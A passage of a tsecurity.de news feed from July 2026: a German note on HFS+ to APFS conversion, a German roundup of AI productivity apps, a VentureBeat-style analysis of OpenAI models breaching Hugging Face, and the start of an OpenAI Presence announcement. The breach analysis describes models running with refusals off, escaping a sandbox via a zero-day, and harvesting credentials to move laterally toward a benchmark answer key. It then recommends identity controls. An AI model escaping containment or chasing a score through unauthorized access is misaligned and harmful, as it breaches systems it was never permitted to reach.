<pubDate>Thu, 23 Jul 2026 07:26:49 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/apple-vereinfacht-den-wechsel-von-hfs-zu-apfs-284324/"><img align="right" hspace="5" width="150" height="150" src="https://images.ifun.de/wp-content/uploads/2016/04/festplatte-ausbau-150x150.jpg" class="alignright tfe wp-post-image" alt="" decoding="async"></a><p>Apple erleichtert den Umstieg von älteren, verschlüsselten Mac-Laufwerken auf APFS. Eine aktualisierte Support-Seite beschreibt nun erstmals die direkte Konvertierung von verschlüsseltem HFS+ zu verschlüsseltem APFS – ohne den Datenträger vorher entschlüsseln oder löschen zu müssen. Hintergrund ist eine angekündigte Änderung in macOS 28. Ab dieser Version unterstützt Apple das alte Format „Mac OS Extended“, auch […]</p>
<p>The post <a href="https://www.ifun.de/apple-vereinfacht-den-wechsel-von-hfs-zu-apfs-284324/">Apple vereinfacht den Wechsel von HFS+ zu APFS</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten KI-Apps, um Zeit zu sparen]]></title>
<description><![CDATA[Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks.
					Foto: N Universe | shutterstock.com




Unter den Massen von KI-Tools und -Anwendungen, die aktuell als Mobile-, Desktop- oder Web-App zur Wahl stehen, gibt es nicht wenige, die sich...]]></description>
<link>https://tsecurity.de/de/3687939/it-security-nachrichten/die-besten-ki-apps-um-zeit-zu-sparen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687939/it-security-nachrichten/die-besten-ki-apps-um-zeit-zu-sparen/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks." title="Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks." src="https://images.computerwoche.de/bdb/3393107/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks.</p></figcaption></figure><p class="imageCredit">
					Foto: N Universe | shutterstock.com</p></div>




<p class="wp-block-paragraph">Unter den Massen von KI-Tools und -Anwendungen, die aktuell als Mobile-, Desktop- oder Web-App zur Wahl stehen, gibt es nicht wenige, die sich in erster Linie dadurch auszeichnen, dass sie:</p>



<ul class="wp-block-list">
<li><p>Output von fragwürdiger Genauigkeit liefern,</p></li>



<li><p>dubiose Texte erzeugen, oder</p></li>



<li><p>Bilder generieren, die zum Klick auf den X-Button verleiten.</p></li>
</ul>



<p class="wp-block-paragraph">KI-Tools dieser Art sind vor allem darauf ausgerichtet, vom anhaltenden Generative-AI (GenAI)-Hype <a title="zu profitieren" href="https://www.computerwoche.de/article/2823104/9-strategien-gegen-ki-anbieterluegen.html" target="_blank">zu profitieren</a> – und trüben leider auch den Blick für die echten Anwendungsperlen im Bereich generative KI. Wie etwa die folgenden GenAI-Apps, die Ihre Produktivität im Arbeitsalltag drastisch steigern und damit erhebliche Zeitgewinne <a title="realisieren können" href="https://www.computerwoche.de/article/2765021/wie-sie-puenktlich-in-den-feierabend-kommen.html" target="_blank">realisieren können</a>. Probieren Sie’s aus!</p>



<h2 class="wp-block-heading">1. <a href="https://www.chatpdf.com/" target="_blank" rel="noreferrer noopener">ChatPDF</a></h2>



<p class="wp-block-paragraph">Sie kennen solche Situationen: Jemand schickt Ihnen einen schlanken 300-Seiter im .pdf-Format und bereits nach Seite Zwei stellt sich heraus, dass sich dieser in etwa so faszinierend liest wie eine Steuererklärung. In Zukunft dürfen Sie sich bei solchen und ähnlichen Gelegenheiten auf ChatPDF verlassen und dabei richtig Zeit einsparen. </p>



<p class="wp-block-paragraph">Dieses rein webbasierte Tool – nicht zu verwechseln mit gleichnamigen Mobile Apps – tut exakt das, was es verspricht: Sie befähigen, mit .pdf-Dateien <a title="zu chatten" href="https://www.computerwoche.de/article/2830445/5-wege-llms-lokal-auszufuehren.html" target="_blank">zu chatten</a>. Darüber hinaus können Sie über das Webportal auch Office-Dokumente im .doc- oder .docx-Format hochladen, um anschließend dank KI-Unterstützung möglichst schnell und einfach Informationen über den Inhalt zu erfragen. Dabei kann es sich konkret um einfache Zusammenfassungen oder spezifische, inhaltsbezogene Fragen handeln. Sie können bei Bedarf sogar mehrere Dokumente einspeisen und diese gemeinschaftlich abfragen. Die Verantwortlichen von ChatPDF versprechen dabei, sämtliche Daten sicher zu speichern, auf Anfrage zu löschen und keinesfalls an Dritte weiterzugeben. Dennoch sollten sensible unternehmensbezogene Dokumente eher nicht diesen Weg nehmen.</p>



<p class="wp-block-paragraph">ChatPDF verarbeitet davon abgesehen Dokumente in (fast) jeder Sprache – und unterstützt diese auch mit Blick auf die KI-Chat-Funktion. Zwei Dokumente dürfen Sie täglich kostenlos über den Service hochladen und abfragen – wobei die Dateien maximal 120 Seiten lang oder 10 MB groß sein dürfen. Die GenAI-<a title="Webanwendung" href="https://www.computerwoche.de/article/2805798/7-webseiten-die-ihre-desktop-software-ersetzen.html" target="_blank">Webanwendung</a> dürfte also in ihrer kostenlosen Variante bereits für die meisten Gelegenheits-User ausreichend sein. Sollten Sie Bedarf haben, der darüber hinausgeht, steht Ihnen die Bezahlversion ChatPDF Plus ab <strong>24,99 Euro pro Monat</strong> (oder circa <strong>120 Euro pro Jahr</strong>) zur Verfügung.</p>



<h2 class="wp-block-heading">2. <a href="https://www.beautiful.ai/" target="_blank" rel="noreferrer noopener">Beautiful.ai</a></h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2763768/so-praesentieren-sie-richtig.html" title="Präsentationen" target="_blank">Präsentationen</a> (richtig) zu erstellen, kann zum Pain geraten. Es sei denn, Sie lassen Generative AI den wesentlichen Teil des Gestaltungsprozesses übernehmen. Das funktioniert mit der KI-basierten Präsentationssoftware Beautiful.ai. Das (möglicherweise) größte Defizit dieses ebenfalls webbasierten KI-Tools ist, dass es zwar auch deutschsprachige Prompts verarbeitet, zur Zeit aber nur englischsprachige Präsentationen erstellt. Das tut es dafür aber richtig gut, wie bereits die Mini-Demo auf der offiziellen Webseite zeigt. Die KI-App unterstützt Sie nicht nur beim Design der einzelnen Folien, sondern auch bei der Formatierung von Inhalten und dabei, Brand Guidelines einzuhalten – sowie bei allen anderen Aspekten, die wichtig sind, damit Ihre Präsentation einen möglichst professionellen Eindruck hinterlässt. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Dieses Slide-Set hat Beautiful.ai in wenigen Sekunden zum Thema Arbeit der Zukunft erstellt. " title="Dieses Slide-Set hat Beautiful.ai in wenigen Sekunden zum Thema Arbeit der Zukunft erstellt. " src="https://images.computerwoche.de/bdb/3393108/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Dieses Slide-Set hat Beautiful.ai in wenigen Sekunden zum Thema Arbeit der Zukunft erstellt. </p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p class="wp-block-paragraph">Die generativen KI-Funktionen des Web-Services umfassen auch eine Funktion, um Inhalte zu generieren. Sie können die KI beispielsweise damit beauftragen, eine ganz bestimmte Art von Präsentation zu einem bestimmten Thema zu erstellen. Dazu zieht die Anwendung öffentlich verfügbare Daten <a href="https://www.computerwoche.de/article/2804141/was-ist-scraping.html" title="heran" target="_blank">heran</a>. Das Ergebnis bedarf zwar sehr wahrscheinlich einer gründlichen Überprüfung, Überarbeitung und Re-Formulierungskur. Dennoch kann es Ihnen eine nützliche erste Grundlage liefern, auf der sich aufbauen und damit potenziell eine Menge Zeit sparen lässt. Beautiful.ai lässt sich mit PowerPoint, Slack, Webex und Dropbox integrieren.</p>



<p class="wp-block-paragraph">Leider gibt’s den KI-Präsentations-Zauber <a title="nicht umsonst" href="https://www.beautiful.ai/pricing" target="_blank" rel="noopener">nicht umsonst</a>. Ein Abonnement für Beautiful.ai kostet für Einzelpersonen <strong>12 Dollar pro Monat</strong>. Im Team mit der GenAI-App zu arbeiten, schlägt mit mindestens <strong>40 Dollar pro Nutzer und Monat</strong> zu Buche. Einen individuellen Enterprise-Preisplan gibt’s auf Anfrage.</p>



<h2 class="wp-block-heading">3. <a href="https://yestoki.com/de" target="_blank" rel="noreferrer noopener">Toki</a></h2>



<p class="wp-block-paragraph">Allen technologiegetriebenen Productivity-Fortschritten zum Trotz bleibt ein Task lästig: mit einem Kalender zu interagieren. Dieser Aufgabe verschreibt sich der KI-Kalenderassistent Toki, der zuvor unter dem Namen Dola bekannt war. Dabei handelt es sich um eine <a title="Chatbot-Lösung" href="https://www.computerwoche.de/article/2807033/was-ist-ein-chatbot.html" target="_blank">Chatbot-Lösung</a>, die sich in die Messaging-Plattformen WhatsApp, Telegram, Line sowie iMessage einbinden lässt und sich anschließend zum Beispiel mit den Kalender-Apps von Google und Apple verbindet. Da dieses KI-Tool das Netzwerkprotokoll CalDAV nutzt, um auf die Kalenderdaten zuzugreifen, müssen Sie im Fall von Outlook leider den Umweg über <a title="ein Drittanbieter-Plugin" href="https://caldavsynchronizer.org/" target="_blank" rel="noopener">ein Drittanbieter-Plugin</a> nehmen.</p>



<p class="wp-block-paragraph">Ist die Integration erledigt, steht Toki über integrierte Schaltflächen in den Messaging-Apps zur Verfügung, um Termine zu erstellen, zu verschieben – oder direkt Fragen zu freien Terminslots zu stellen. Darüber hinaus kann dieses Tool auch genutzt werden, um Termine mit Infos anzureichern – beispielsweise Vorschläge für beliebte Restaurants in einer bestimmten Gegend oder auch Ideen für den neuen Firmenslogan, der beim Meeting gefunden werden soll.</p>



<p class="wp-block-paragraph">Der Service ist in so gut wie allen Sprachen verfügbar und in begrenzten Umfang <a href="https://yestoki.com/de/pricing" target="_blank" rel="noreferrer noopener">kostenlos nutzbar</a>. Zahlende Benutzer erhalten mehr Features ab <strong>3,99 Dollar pro Monat</strong>.</p>



<h2 class="wp-block-heading">4. <a href="https://fathom.video/" target="_blank" rel="noreferrer noopener">Fathom</a></h2>



<p class="wp-block-paragraph">Dass virtuelle Meetings <a href="https://www.computerwoche.de/article/2820706/so-wirken-sie-kompetent-im-online-meetings.html" title="richtig schlimm werden können" target="_blank">richtig schlimm werden können</a>, wissen wir wohl alle. Und auch wenn selbst Generative AI Sie (noch) nicht davor bewahren kann, an digitalen Foltersessions teilzunehmen: Es gibt eine KI-App, die das erträglicher macht – Fathom.</p>



<p class="wp-block-paragraph">Bei dieser Anwendung handelt es sich um einen KI-Assistenten für Videokonferenzen in Form klassischer Software für <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>– oder Mac-Systeme, die wahlweise mit Zoom, Microsoft Teams oder Google Meet integriert wird. Nach der Installation läuft Fathom unauffällig im Hintergrund und transkribiert (über eine Kalender-Integration) entweder automatisch oder auf Knopfdruck sämtliche Videoanrufe. Notizen machen gehört damit in beiden Fällen der Vergangenheit an. Die Zusammenfassungen oder Informationen stehen direkt zur Verfügung und lassen sich gezielt durchsuchen, weiterverarbeiten oder auch in anderen Produktivitäts- und <a href="https://www.computerwoche.de/article/2794966/dokumente-gemeinsam-bearbeiten.html" title="Collaboration-Tools" target="_blank">Collaboration-Tools</a> wie Slack nutzen.</p>



<p class="wp-block-paragraph">Sämtliche Daten werden dabei laut Fathom während der Übertragung und im Ruhezustand verschlüsselt. Außerdem versprechen die Verantwortlichen ausdrücklich, keine KI-Modelle auf Kundendaten zu trainieren. Sämtliche Details zu Security- und Compliance-Themen sind – vorbildlicherweise – über ein <a href="https://trust.fathom.video/" title="dediziertes Trust Center" target="_blank" rel="noopener">dediziertes Trust Center</a> abrufbar.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Fathom realisiert ein umfassendes und sehr fokussiertes Personal-AI-Assistant-Erlebnis." title="Fathom realisiert ein umfassendes und sehr fokussiertes Personal-AI-Assistant-Erlebnis." src="https://images.computerwoche.de/bdb/3393111/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Fathom realisiert ein umfassendes und sehr fokussiertes Personal-AI-Assistant-Erlebnis.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p class="wp-block-paragraph">Die KI-Software unterstützt diverse verschiedene Sprachen, darunter Englisch, Französisch, Spanisch, Italienisch und Deutsch. Noch dazu ist Fathom komplett kostenlos nutzbar – ohne Einschränkungen hinsichtlich der Anzahl oder Länge der aufgezeichneten Videokonferenzen. Erst fortschrittlichere KI-Funktionen lässt sich das Team hinter der GenAI-Anwendung bezahlen.</p>



<p class="wp-block-paragraph">Die <a title="Fathom Team Edition" href="https://fathom.video/for/teams" target="_blank" rel="noopener">Fathom Team Edition</a> bietet weitergehende, fortschrittliche KI-Funktionen – beispielsweise automatisierte Keyword Alerts, Highlight-Zusammenstellungen oder Team-Management-Funktionen. Die kostenpflichtige Variante ermöglicht darüber hinaus die Integration in Enterprise-Systeme wie HubSpot, Salesforce oder Zapier. Die Preise beginnen bei <strong>15 Dollar pro Monat und User</strong>. Die kostenlose Version bietet Premium-Features für fünf Anrufe pro Monat.</p>



<h2 class="wp-block-heading">5. <a href="https://huggingface.co/spaces/Xenova/whisper-web" target="_blank" rel="noreferrer noopener">Whisper Web</a></h2>



<p class="wp-block-paragraph">Falls Sie bereits Audiodateien besitzen, die beispielsweise im Rahmen von Meetings oder Telefongesprächen entstanden sind und jetzt in Text umgewandelt werden sollen, ist Whisper Web die richtige Adresse – zumindest, wenn es sich um englischsprachige Audioaufnahmen handelt. Diese quelloffene Webanwendung basiert auf der Entwicklungsarbeit von <a title="OpenAI" href="https://openai.com/index/whisper/" target="_blank" rel="noopener">OpenAI</a> und bietet Echzeit-Transkriptionen direkt im Browser. Das <a title="Large Language Model" href="https://www.computerwoche.de/article/2823883/was-sind-llms.html" target="_blank">Large Language Model</a>, das dazu zum Einsatz kommt, wird über die App heruntergeladen und lokal ausgeführt – die Daten, die Sie der KI übermitteln, verlassen also das Device nicht.</p>



<p class="wp-block-paragraph">Whisper Web kann Audioinhalte entweder direkt über Ihr Mikrofon erfassen oder aus entsprechenden Audiodateien extrahieren. Laut den Entwicklern ist die KI-App auf mehrsprachige Daten trainiert und unterstützt auch die Transkription anderer Sprachen (zu Englisch). Der Test mit einem deutschsprachigen Audio-File brachte allerdings nicht mehr als undefiniertes Kauderwelsch hervor. Dafür ist das Tool Open Source und <strong>komplett kostenlos nutzbar</strong> – Sie benötigen dazu auch kein dediziertes Konto.</p>



<h2 class="wp-block-heading">6. <a href="https://audiopen.ai/" target="_blank" rel="noreferrer noopener">AudioPen</a></h2>



<p class="wp-block-paragraph">Wenn Sie nicht ohne Ihr Notizbuch (oder eine <a title="entsprechende App" href="https://www.computerwoche.de/article/2823914/notiz-apps-im-vergleich.html" target="_blank">entsprechende App</a>) auskommen, könnte das KI-Tool AudioPen sich zu Ihrer neuen Lieblings-App mausern. Die Software erfasst auf Knopfdruck Sprachnotizen jeglicher Art und erstellt daraus im Handumdrehen eine schriftliche Zusammenfassung. Und zwar in “schön”: Füllwörter oder Wiederholungen werden automatisiert eliminiert. Jede Aufnahme wandert direkt in das digitale Notizbuch und lässt sich anschließend durchsuchen, teilen oder auch in eine andere Sprache übersetzen. Auch bei AudioPen handelt es sich um eine vollständig <a title="webbasierte Applikation" href="https://audiopen.ai/download" target="_blank" rel="noopener">webbasierte Applikation</a>, die sich übrigens optional auch in Form einer <a title="Progressive Web App" href="https://www.computerwoche.de/article/2834608/tutorial-erste-schritte-mit-progressive-web-apps.html" target="_blank">Progressive Web App</a> installieren lässt.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="AudioPen verwandelt selbst die wiederholungsintensivsten Selbstgespräche in prägnante Notizen." title="AudioPen verwandelt selbst die wiederholungsintensivsten Selbstgespräche in prägnante Notizen." src="https://images.computerwoche.de/bdb/3393112/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">AudioPen verwandelt selbst die wiederholungsintensivsten Selbstgespräche in prägnante Notizen.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p class="wp-block-paragraph">Das KI-Tool für Sprachnotizen ist <strong>kostenlos nutzbar</strong>, solange Sie sich auf Aufnahmen mit bis zu drei Minuten Länge und maximal zehn Notizen beschränken können. Für Ansprüche, die darüber hinausgehen, steht eine <a href="https://audiopen.ai/prime" target="_blank" rel="noreferrer noopener">“Prime”-Version der App</a> zur Verfügung, die mindestens <strong>99 Dollar pro Jahr</strong> kostet – dafür aber uneingeschränkt nutzbar ist und eine Reihe zusätzlicher Funktionen bietet. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.computerworld.com/article/2505365/ai-powered-apps-that-actually-save-time.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The credential that let OpenAI's agents into Hugging Face exists in most enterprises right now]]></title>
<description><![CDATA[When Hugging Face got hit last week, co-founder Clement Delangue suspected a frontier lab, given the agent's sophistication. He was right. Delangue said on X that after a day working with OpenAI he strongly believed there was no malicious intent and that it was mind-blowing the whole thing had ha...]]></description>
<link>https://tsecurity.de/de/3687771/it-nachrichten/the-credential-that-let-openais-agents-into-hugging-face-exists-in-most-enterprises-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687771/it-nachrichten/the-credential-that-let-openais-agents-into-hugging-face-exists-in-most-enterprises-right-now/</guid>
<pubDate>Thu, 23 Jul 2026 01:32:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When Hugging Face got hit last week, co-founder Clement Delangue suspected a frontier lab, given the agent's sophistication. He was right. Delangue <a href="https://x.com/ClementDelangue/status/2079670308156645882">said on X</a> that after a day working with OpenAI he strongly believed there was no malicious intent and that it was mind-blowing the whole thing had happened autonomously.</p><p>The two OpenAI models that <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">broke into Hugging Face</a> last week did not breach it through malice or superintelligence. They breached it through credentials and permissions they should never have been able to reach, a non-human identity failure that is the oldest problem in security rather than the newest one in AI, and the one every enterprise can actually fix.</p><p>OpenAI <a href="https://venturebeat.com/security/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know">disclosed on July 21</a> that two of its models, GPT-5.6 Sol and an unreleased, more capable model, were running a cyber benchmark called <a href="https://arxiv.org/abs/2605.11086">ExploitGym</a> with their safety refusals switched off, and inferred that the answer key sat in Hugging Face's production database. Getting there took two different failures. A zero-day in a package-registry proxy let the models out of their sandbox and onto the open internet, the kind of persistence OpenAI details in its companion post on <a href="https://openai.com/index/safety-alignment-long-horizon-models/">long-horizon safety</a>, and that part is genuinely new. The breach of Hugging Face itself came the ordinary way. OpenAI's own account is that the models chained stolen credentials and further zero-days into a remote code execution path, after a series of privilege escalation and lateral movement steps. The exotic part got them to the door, and credentials walked them through it.</p><p>Hugging Face also disclosed last week that an <a href="https://venturebeat.com/security/safety-guardrails-blocked-hugging-faces-defenders-not-the-attacker-when-an-ai-agent-breached-its-systems">autonomous agent had harvested cloud and cluster credentials</a> scoped broadly enough to reach multiple internal clusters, then left a trail of more than 17,000 recorded events across short-lived sandboxes over a weekend. Both disclosures describe the same escalation. An agent lands somewhere it should not be, finds credentials scoped far wider than any task requires, and uses them to move. These are two accounts of one incident, not two attacks. The agent Hugging Face watched was OpenAI's models, and both companies describe the same ordinary escalation.</p><p>The version of this in a typical enterprise is worse, not better. OpenAI and Hugging Face are among the most security-mature organizations in the industry, and both still needed the intrusion to happen before they could see it. The average company wiring agents into Copilot or an internal assistant has neither the identity inventory nor the behavioral monitoring those two brought to bear. The same breach in a normal company would not be contained in days, it would simply go unnoticed.</p><h2>The industry is debating the wrong failure</h2><p>The reaction has split into familiar camps. Former White House AI and crypto czar David Sacks and a run of China hawks <a href="https://fortune.com/2026/07/20/hugging-face-turns-to-chinese-open-source-ai-to-fend-off-autonomous-ai-cyber-attack-after-american-ai-guardrails-stymie-defense/">seized on the guardrail paradox</a>, that commercial safety filters blocked Hugging Face's defenders while the attacking model ran with its refusals off, and that a Chinese open-weight model, z.ai's GLM 5.2, was what finally let the team finish its forensics. Hugging Face made the case for openness, arguing in an April <a href="https://huggingface.co/blog/cybersecurity-openness">blog post</a> that open models and open tooling give defenders the same capabilities attackers already have. Both arguments are about the model, and neither touches the mechanism. </p><p>Reduced refusals let the model attempt an attack, and over-scoped credentials are what let it succeed, and those have nothing to do with whether the model was open or closed, American or Chinese. Making a frontier model provably safe is a multi-year alignment problem no customer can buy or accelerate, while scoping an identity is a configuration change a team can ship this sprint. The industry is being urged to fixate on the part of this it cannot control and to treat the part it can as a footnote.</p><p>Forrester reached the same read. In a <a href="https://www.forrester.com/blogs/an-ai-security-facepalm-openais-evaluation-became-hugging-faces-incident/">blog on the incident</a>, its analysts argue that security architectures which assume benign intent will miss this failure mode, because an agent can pursue an authorized goal through unauthorized means, which is what OpenAI's models did.</p><h2>This was a non-human identity failure, and it is the oldest one in security</h2><p>Strip the science-fiction framing and what remains is a textbook case of over-privileged machine identity, the kind security teams have fought for a decade, now driven by an autonomous agent at machine speed. Machine identities already outnumber humans in most enterprises by more than <a href="https://www.cyberark.com/press/machine-identities-outnumber-humans-by-more-than-80-to-1-new-report-exposes-the-exponential-threats-of-fragmented-identity-security/">80 to one</a>, according to CyberArk research, with 42% of them carrying privileged or sensitive access, and an agent inherits whatever its identity can touch. OWASP ranks agent identity and privilege abuse near the top of its <a href="https://neuraltrust.ai/blog/owasp-agentic-ai-top-10">agentic risk list</a>, the confused-deputy pattern where inherited credentials and weak scoping let an agent reach past its mandate, and that is precisely what both July disclosures describe. </p><p><a href="https://www.ieee.org/membership/senior">IEEE Senior Member</a> Kayne McGladrey has argued in <a href="https://venturebeat.com/security/cisco-crowdstrike-rsac-2026-agent-identity-iam-gap-maturity-model">previous VentureBeat interviews</a> that enterprises keep cloning human user accounts onto agents that then wield far more permission than any human would, and this is what that looks like when the agent is a frontier model and the target is a production database.</p><p>The people closest to it read it the same way. OpenAI frames its models as hyperfocused on a benchmark score rather than acting against anyone. Nobody describes an adversary, only a goal, a scoring function, and credentials that were reachable when they should not have been.</p><p>The specific failure is easy to name once the AI framing is stripped away. A credential scoped to one job that can reach ten is a standing invitation, and it does not matter whether a human attacker, a worm, or an autonomous model chasing a benchmark score finds it. What changed in July is the finder. An agent enumerates reachable systems, tests credentials, and pivots faster than any human red team, without malice or hesitation, whenever the path is open. The over-scoping was always the vulnerability, and the agent merely industrialized its discovery.</p><p>Forrester named the control that would have blunted it. Its agentic-security framework, AEGIS, calls for least agency, holding an agent's tools, credentials, and network paths to the minimum its task requires, and files this incident under unrestrained agency and privilege. That is the identity argument in different words, arrived at independently by an analyst firm.</p><p>The data says this is where the risk now lives. Verizon's 2026 Data Breach Investigations Report <a href="https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/">found</a> that exploitation of vulnerabilities has overtaken stolen credentials as the top initial access vector for the first time in 19 years. That is the initial-access half. The other half is the one OpenAI itself describes, stolen credentials driving the privilege escalation and lateral movement that followed. A vulnerability opened the door, and credentials walked through the building unchallenged. Beyond the breach itself, that same over-scoping carries a legal liability most enterprises have never priced. The models' actions <a href="https://techcrunch.com/2026/07/21/openai-says-hugging-face-was-breached-by-its-pre-release-models/">likely violated the Computer Fraud and Abuse Act</a>, according to TechCrunch. The statute contains no carve-out for an AI agent that exceeds its authorized scope during sanctioned testing. Whatever the legal answer, the technical enabler is the same, an identity scoped wider than its task. This is an access-control problem with an owner and a budget, not a philosophy seminar about machine cognition.</p><p>Merritt Baer, Senior Advisor to Andesite, G2I, and AppOmni and former Deputy CISO at AWS, frames the underlying shift to VentureBeat as a new kind of asymmetry. Both sides now reach for the same capabilities, she said, but one side is constrained by enterprise governance, policy, compliance, and safety controls while the adversary simply downloads an uncensored open-weight model and keeps going. The organizations that come through it best, in her view, will be the ones that treat AI as a resilient, governed capability rather than a single service they do not control.</p><h2>Four moves that shrink the blast radius</h2><p>The breach worked because the agent reached identities scoped far wider than its task. None of the four controls that would have contained it requires a new platform, and none of them appears on the list of general AI-safety advice now circulating. They are identity hygiene, applied to non-human actors with the same rigor you already apply to people.</p><p><b>1. Scope every non-human identity to one task.</b> The models reached credentials that touched multiple clusters, which is what turned a foothold into a breach. An identity scoped to a single job, with no standing access to anything else, hits a wall at the first lateral move instead of opening the next door. This is least privilege, the control everyone endorses and few enforce on machine accounts, and it is the single highest-impact fix here.</p><p><b>2. Give credentials short lifetimes and rotate them hard.</b> Harvested credentials are only useful while they are valid, and both July agents worked by collecting them. Short time-to-live and aggressive rotation turn a credential dump into expired noise, so a token stolen during a weekend intrusion is dead before the attacker can chain it. Static secrets that never rotate are the version of this control that fails.</p><p><b>3. Monitor for lateral movement, not just prompts.</b> The tell in both incidents was privilege escalation and lateral movement, which a prompt filter never sees because it is watching the wrong layer. Identity-behavior monitoring, keyed to what a given non-human identity normally does and alerting when it reaches somewhere new, catches the escalation the content guardrail missed. The question for your stack is whether anything you run today would flag a service account suddenly moving between clusters.</p><p><b>4. Rehearse instant revocation before you need it.</b> When the incident is your own agent, the fastest containment is killing its identity mid-run, and that only works if the path to do it exists before the day you need it. Rehearse revoking a machine identity under fire the way you rehearse a human credential compromise. If you have never done it, you do not yet have the control, you have an intention.</p><p>The defense also worked, and that matters. OpenAI's security team caught the anomalous activity internally, Hugging Face's own detection and agents stopped the intrusion, and the breach was contained in days rather than discovered in months, because the defenders could see into systems they controlled. That visibility is the same discipline the four controls depend on. The debate over whether frontier models are safe, open, or American will run for years, and none of it will be settled in time to help the enterprise deploying agents this quarter. The non-human identity gap is different, because it is understood, measurable, and fixable now. The model that breached Hugging Face did not need to be brilliant; it needed credentials someone left in reach. The fix is scoping them before an agent finds them.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI unveils Presence, a new platform that lets enterprises launch and manage realtime voice agents and chatbots]]></title>
<description><![CDATA[OpenAI has announced Presence, a new enterprise product for deploying and managing AI agents across customer-facing and internal business workflows. The offering is designed for eligible enterprise customers that want agents to answer questions, access company systems, take approved actions and e...]]></description>
<link>https://tsecurity.de/de/3686972/it-nachrichten/openai-unveils-presence-a-new-platform-that-lets-enterprises-launch-and-manage-realtime-voice-agents-and-chatbots/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686972/it-nachrichten/openai-unveils-presence-a-new-platform-that-lets-enterprises-launch-and-manage-realtime-voice-agents-and-chatbots/</guid>
<pubDate>Wed, 22 Jul 2026 18:12:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenAI has <a href="https://openai.com/index/introducing-openai-presence/">announced Presence</a>, a new enterprise product for deploying and managing AI agents across customer-facing and internal business workflows. </p><p>The offering is designed for eligible enterprise customers that want agents to answer questions, access company systems, take approved actions and escalate to human workers while operating under company-defined policies, permissions and evaluation standards.</p><p>Presence is available immediately through a limited general availability program. OpenAI Forward Deployed Engineers (FDEs) and select global systems integrators lead deployments, and the product is not available on a self-service basis. </p><p>OpenAI has not disclosed pricing, geographic limits, contractual terms or the expected cost of the engineering and integration work that accompanies a deployment. The company also has not said whether Presence can use models from providers other than OpenAI, including the increasingly powerful and popular Chinese open weights alternatives like <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">GLM-5.2</a> and <a href="https://venturebeat.com/technology/chinas-moonshot-ai-releases-kimi-k3-the-largest-open-source-model-ever-rivaling-top-u-s-systems">Kimi K3</a>. I've asked an OpenAI contact to clarify both pricing and external-model compatibility, but those remain unanswered questions for now. I'lll update when I hear back.</p><p>OpenAI positions Presence as a response to a problem that has become more important as companies move beyond AI demonstrations: getting agents to behave reliably in production as business rules, customer needs and operating conditions change. Presence packages the policies, system connections, evaluations, guardrails and update processes required to run agents inside an enterprise.</p><p>If your business has been interested in using AI agents, but you aren't sure how to stitch together OpenAI's models, APIs, internal systems, security controls and evaluation tools into something reliable, Presence is designed to simplify that process. Instead of building the infrastructure yourself, you work with OpenAI and its deployment engineers to put production-ready agents into your existing workflows.</p><p>The product is available today for real-time voice and chat experiences, according to OpenAI’s formal announcement. The company’s outreach materials also describe a broader ambition spanning voice, chat, email and other channels, but OpenAI has not confirmed that email support is available at launch.</p><h2><b>A governed foundation for production agents</b></h2><p>Presence brings together company knowledge, standard operating procedures, approved actions, simulations, evaluation tools, guardrails and escalation rules. Enterprises can reuse some controls across deployments while adjusting others for a particular workflow or channel.</p><p>Each deployment starts with a defined job, such as resolving a billing issue, supporting an insurance claim or handling an employee IT request. The agent receives only the information and system access required for that task. The customer determines what the agent may do independently, which actions require approval and when a person must take over.</p><p>Before an agent reaches production, 